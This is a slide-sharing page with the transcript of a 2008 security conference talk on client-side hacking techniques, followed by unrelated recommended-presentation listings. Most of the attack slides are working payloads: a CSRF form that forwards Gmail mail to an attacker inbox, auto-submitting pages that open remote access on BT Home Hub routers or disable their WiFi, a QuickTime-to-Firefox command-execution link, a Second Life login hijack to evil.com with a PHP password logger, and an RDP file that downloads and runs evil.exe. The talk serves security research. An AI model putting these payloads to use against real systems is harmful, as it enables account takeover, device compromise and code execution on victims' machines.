confidence 2008 krakow
play

CONFIDENCE 2008 KRAKOW pdp information security researcher, - PowerPoint PPT Presentation

Aug 24, 2022 •283 likes •929 views

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure

  2. CONFIDENCE 2008 KRAKOW

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. Cutting-edge Think Tank

  6. ABOUT GNUCITIZEN  Think tank  Research  Training  Consultancy  Ethical Hacker Outfit  Responsible disclosure  We have nothing to hide  Tiger Team  The only active Tiger Team in UK.  Proud to have some of the best pros in our team.

  7. OTHERS  Hakiri  Hacker Lifestyle  Spin Hunters  Social Hacking Research House  House of Hackers  Hacker Social Network

  8. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  9. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  10. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  11. THE GMAIL HIJACK TECHNIQUE

  12. THE GMAIL HIJACK TECHNIQUE

  13. THE GMAIL HIJACK TECHNIQUE

  14. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  15. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  16. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  17. PWNING BT HOME HUB  Enable Remote Assistance <html>  <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//? ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  18. PWNING BT HOME HUB  Disable Wireless Connectivity <html>  <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  19. PWNING BT HOME HUB  Call Jacking POST http://api.home/cgi/b/_voip_/stats//?  ce=1&be=0&l0=-1&l1=-1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  20. PWNED!!! Thanks to AP!!!

  21. PWNED!!! SNOM .mario hacked Snom

  22. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"  creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D %0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form- data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D %0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  23. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method <form method="post" action="http://kuza55.awardspace.com/files.php"  enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  24. QUICKTIME PWNS FIREFOX  QuickTime Media Links <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  25. QUICKTIME PWNS FIREFOX  The Exploit <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local; 1'].createInstance(Components.interfaces.nsILocalFile);file.initWit hPath('c:\\windows\\system32\\calc.exe');process=Components.classes ['@mozilla.org/process/util; 1'].createInstance(Components.interfaces.nsIProcess);process.init(f ile);process.run(true,[],0);void(0); "/>

  26. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  27. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  28. IE PWNS SECOND LIFE  Avatar Theft [HTTP_RAW_POST_DATA] => <methodCall>  <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  29. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  30. ALL YOUR AVATARS ARE BELONG TO US!!!

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA [WFClient]  Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  32. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

Recommend

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi (name??) Im Kerri! We had an appointment at ____ and its _____ time (so, Im actually ahead of the game)! &lt;&lt;pause&gt;&gt; Thank

50 views • 4 slides
CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many

CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many

CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many applications: You flip a coin once and get H . How effective is a medication? Do think that Pr [ H ] = 1? Confidence Intervals Are we sure of the

301 views • 3 slides
K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear

K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear

Enhancing Regional Financial Cooperation in South Asia A Regulators Perspective K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear uncertainty Looking for scapegoats Confidence building

247 views • 22 slides
POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global

POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global

POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global outsourcing cities in 2017 Basic Facts Biggest cities Area: 312, 678 sq.km Warsaw 1.75 Mio Population 38 million Krakow 0.76 Mio Capital:

676 views • 25 slides
Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring

Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring

Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring Equipment Used High Confidence Age of Data Med. Confidence Surveying Low Confidence Technique Unassessed Other CAN and USA used Electronic

194 views • 6 slides
Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval

Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval

Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval Reviewing Conditions and Rules Constructing a Confidence Interval for a Mean Matched Pairs &amp; Two-Sample Studies Inference for

330 views • 28 slides
XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018,

XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018,

XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018, Krakow 07.06 - 12.06 2018 Outline XYZ states Probing X(3872) composition quantum number confirmed 1 ++ [PRD 92 (2015) 011102] Enigmatic

489 views • 25 slides
Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March

Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March

Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March 21, 2014 Ellen C. Ginsberg Vice President, General Counsel and Secretary Nuclear Energy Institute Background Waste Confidence Decision: - A

277 views • 11 slides
High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence

High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence

2007-11-26 Outline Introduction High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence based Prune Strategy MAXCONF Algorithm Kang Deng Evaluation U i University of Alberta it f Alb t

83 views • 7 slides
Dunk Island Work Experience work! We joined the rest of the staff in June 1 - 7, 2008 the

Dunk Island Work Experience work! We joined the rest of the staff in June 1 - 7, 2008 the

Issue 08, June 20, 2008 quickly gaining THOUGHT FOR THE DAY confidence with the There is no limit to what can be accomplished if it doesn't routines and the matter who gets the credit - Ralph Waldo Emerson guests. What a beautiful

995 views • 4 slides
Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT large sample confidence intervals for the mean. Three views of confidence intervals. Constructing a confidence interval without normality: the

478 views • 18 slides
Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT large sample confidence intervals for the mean. Three views of confidence intervals. Constructing a confidence interval without normality: the

644 views • 16 slides
Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of

Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of

Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of Error From Probability to Confidence Constructing a Confidence Interval Examples Example: What Can We Infer About Population? Background :

723 views • 24 slides
Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in

Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in

Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in (non)competitive settings John Haleblian via Mark L oczy Gerry McNamara The A. Gary Anderson Graduate School of Management University of

515 views • 36 slides
Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New

Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New

Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New Pathway Forward A STREAMLINED STRUCTURE NEW! FINANCING AND MARKET EXPANSION: CHINESE SUBSIDIARY Reduced expense burn Prioritized programs

217 views • 7 slides
3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use

3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use

3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use of ICTs 22nd May 2008 GENEVA VOICE OVER IP (VoIP) Presented by Graham Butler President &amp; C.E.O Bitek International Inc www.bitek.com

191 views • 17 slides
Confidence Intervals II 18.05 Spring 2014 Jeremy Orloff and Jonathan Bloom Agenda Polling:

Confidence Intervals II 18.05 Spring 2014 Jeremy Orloff and Jonathan Bloom Agenda Polling:

Confidence Intervals II 18.05 Spring 2014 Jeremy Orloff and Jonathan Bloom Agenda Polling: estimating p in Bernoulli( p ). CLT large sample confidence intervals for the mean. Three views of confidence intervals. Constructing a confidence

562 views • 18 slides
Confidence inter v als P R AC TIC IN G STATISTIC S IN TE R VIE W QU E STION S IN P YTH ON Conor

Confidence inter v als P R AC TIC IN G STATISTIC S IN TE R VIE W QU E STION S IN P YTH ON Conor

Confidence inter v als P R AC TIC IN G STATISTIC S IN TE R VIE W QU E STION S IN P YTH ON Conor De w e y Data Scientist , Sq u arespace Intro to sampling 1 Wikimedia PRACTICING STATISTICS INTERVIEW QUESTIONS IN PYTHON What is a confidence

385 views • 35 slides
= S ( X X )( X X ) X X = ( 1) p n j 1 j j ( X

= S ( X X )( X X ) X X = ( 1) p n j 1 j j ( X

Simultaneous confidence statements and multiple comparisons (cf. section 5.4) From this we find that a 100(1- )% confidence region , , , ( , ) X X X N We assume that are i.i.d. 1 2 n p for the

330 views • 4 slides
Ge surface cleaning B. Majorowits a , M. Wojcik b , G. Zuzel b ) MPI-P , Munich a ) IF UJ, Krakow

Ge surface cleaning B. Majorowits a , M. Wojcik b , G. Zuzel b ) MPI-P , Munich a ) IF UJ, Krakow

Ge surface cleaning B. Majorowits a , M. Wojcik b , G. Zuzel b ) MPI-P , Munich a ) IF UJ, Krakow b GERDA general meeting, LNGS Italy, 1-3.03.2010 Outlook Applied technique for Ge cleaning - Loading samples with the Rn daughters -

458 views • 12 slides
INDIAN MOBILE TELECOMMUNICATIONS: 2007-2008 By- T.V. Ramachandran Director General, COAI April

INDIAN MOBILE TELECOMMUNICATIONS: 2007-2008 By- T.V. Ramachandran Director General, COAI April

INDIAN MOBILE TELECOMMUNICATIONS: 2007-2008 By- T.V. Ramachandran Director General, COAI April 23, 2008 @ Mumbai INDIAS TRYST WITH DESTINY I see a nation that has the capacity and confidence to address and resolve these challenges.

246 views • 23 slides
Comfort or Confidence? Certainty, Comfort, or Confidence? In times of instability it is human

Comfort or Confidence? Certainty, Comfort, or Confidence? In times of instability it is human

Curating Joy in Crises Certainty Comfort or Confidence? Certainty, Comfort, or Confidence? In times of instability it is human to desire for some certainty- some stability that helps us regain our equilibrium. This is not a bad

693 views • 5 slides
MP - Magnetisation Processes Joo-Von Kim Centre for Nanoscience and Nanotechnology, Universit

MP - Magnetisation Processes Joo-Von Kim Centre for Nanoscience and Nanotechnology, Universit

ESM 2018 Krakow MP - Magnetisation Processes Joo-Von Kim Centre for Nanoscience and Nanotechnology, Universit Paris-Saclay 91120 Palaiseau, France joo-von.kim@c2n.upsaclay.fr 2 Outline European School on Magnetism 2018, Krakow

692 views • 45 slides
Mikhail V. Medvedev (KU) Students (at KU): Simulations: Sarah Reynolds, Ken-Ichi Nishikawa (U.

Mikhail V. Medvedev (KU) Students (at KU): Simulations: Sarah Reynolds, Ken-Ichi Nishikawa (U.

&quot;Kinetic Modeling of Astrophysical Plasmas&quot; Krakow, October 7, 2008 bonus: nus: CRs + B B-fiel elds ds in a Foreshoc eshock Mikhail V. Medvedev (KU) Students (at KU):

485 views • 36 slides

More recommend